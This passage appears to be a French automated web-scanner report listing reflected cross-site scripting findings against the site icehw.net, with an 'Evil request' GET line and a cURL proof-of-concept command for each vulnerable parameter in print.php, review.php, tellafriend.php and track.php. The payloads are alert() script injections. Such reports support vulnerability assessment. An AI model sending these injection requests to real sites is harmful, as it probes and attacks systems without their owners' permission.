</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=74&page=%3CScRiPt%3Ealert%28%27wkui9vpcpq%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=108&page=%3CScRiPt%3Ealert%28%27w0yjpwgtkg%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=108&page=%3CScRiPt%3Ealert%28%27w0yjpwgtkg%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=94&page=%3CScRiPt%3Ealert%28%27wn4ry2ru5t%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=94&page=%3CScRiPt%3Ealert%28%27wn4ry2ru5t%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=72&page=%3CScRiPt%3Ealert%28%27wrlk7mh70p%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=72&page=%3CScRiPt%3Ealert%28%27wrlk7mh70p%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=147&page=%3CScRiPt%3Ealert%28%27wjhtrjcljv%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=147&page=%3CScRiPt%3Ealert%28%27wjhtrjcljv%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=71&page=%3CScRiPt%3Ealert%28%27wfox5xp224%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=71&page=%3CScRiPt%3Ealert%28%27wfox5xp224%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=149&page=%3CScRiPt%3Ealert%28%27w92gobbl1t%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=149&page=%3CScRiPt%3Ealert%28%27w92gobbl1t%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=101&page=%3CScRiPt%3Ealert%28%27wf8g71b3to%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=101&page=%3CScRiPt%3Ealert%28%27wf8g71b3to%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=121&page=%3CScRiPt%3Ealert%28%27w6xj49gsuy%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=121&page=%3CScRiPt%3Ealert%28%27w6xj49gsuy%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=113&page=%3CScRiPt%3Ealert%28%27wgt9s3sylq%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=113&page=%3CScRiPt%3Ealert%28%27wgt9s3sylq%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=96&page=%3CScRiPt%3Ealert%28%27wwezdz8y0y%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=96&page=%3CScRiPt%3Ealert%28%27wwezdz8y0y%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=119&page=%3CScRiPt%3Ealert%28%27wkhpq4zdgf%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=119&page=%3CScRiPt%3Ealert%28%27wkhpq4zdgf%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=146&page=%3CScRiPt%3Ealert%28%27wkl5wdoirp%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=146&page=%3CScRiPt%3Ealert%28%27wkl5wdoirp%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=110&page=%3CScRiPt%3Ealert%28%27wt8tupegvf%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=110&page=%3CScRiPt%3Ealert%28%27wt8tupegvf%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=127&page=%3CScRiPt%3Ealert%28%27whs6zrx8sj%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=127&page=%3CScRiPt%3Ealert%28%27whs6zrx8sj%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=148&page=%3CScRiPt%3Ealert%28%27wj6yxtq6ue%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=148&page=%3CScRiPt%3Ealert%28%27wj6yxtq6ue%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=73&page=%3CScRiPt%3Ealert%28%27ww5j93kz5x%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=73&page=%3CScRiPt%3Ealert%28%27ww5j93kz5x%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /print.php?id=105&page=%3CScRiPt%3Ealert%28%27wepcw9k842%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/print.php?id=105&page=%3CScRiPt%3Ealert%28%27wepcw9k842%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /review.php?id=160&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27w8utwtrb7p%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/review.php?id=160&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27w8utwtrb7p%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /review.php?id=158&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wuyd7dencr%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/review.php?id=158&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wuyd7dencr%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /review.php?id=157&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wtjh8m1zyg%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/review.php?id=157&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wtjh8m1zyg%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /review.php?id=144&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wty2qtxh9e%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/review.php?id=144&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27wty2qtxh9e%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /review.php?id=147&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27w1d0x4avjd%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/review.php?id=147&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27w1d0x4avjd%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /review.php?id=149&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27weamncvy9e%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/review.php?id=149&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27weamncvy9e%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /review.php?id=146&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27w2h9ropc2h%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/review.php?id=146&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27w2h9ropc2h%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre page
</br>Evil request:
</br>    GET /review.php?id=148&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27waq2kq2hwt%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/review.php?id=148&page=%22%3E%3C%2Fa%3E%3CScRiPt%3Ealert%28%27waq2kq2hwt%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre id
</br>Evil request:
</br>    GET /tellafriend.php?id=%22%3E%3C%2Fform%3E%3CScRiPt%3Ealert%28%27wqwv75er4n%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/tellafriend.php?id=%22%3E%3C%2Fform%3E%3CScRiPt%3Ealert%28%27wqwv75er4n%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>Faille XSS trouvée via l'injection dans le paramètre id
</br>Evil request:
</br>    GET /track.php?id=%3CScRiPt%3Ealert%28%27wmrskkoejh%27%29%3C%2FsCrIpT%3E HTTP/1.1
</br>    Host: icehw.net
</br>PoC en commande cURL : "curl "http://icehw.net/track.php?id=%3CScRiPt%3Ealert%28%27wmrskkoejh%27%29%3C%2FsCrIpT%3E""
</br>
</br>                                  *   *   *
</br>
</br>********************************************************************************
</br>
</br>Résumé des anomalies :
</br>----------------------
</br>                                                Erreur interne au serveur :   0
</br>                                       Consommation anormale de ressource :   0
</br>********************************************************************************
</br> </body> 
</html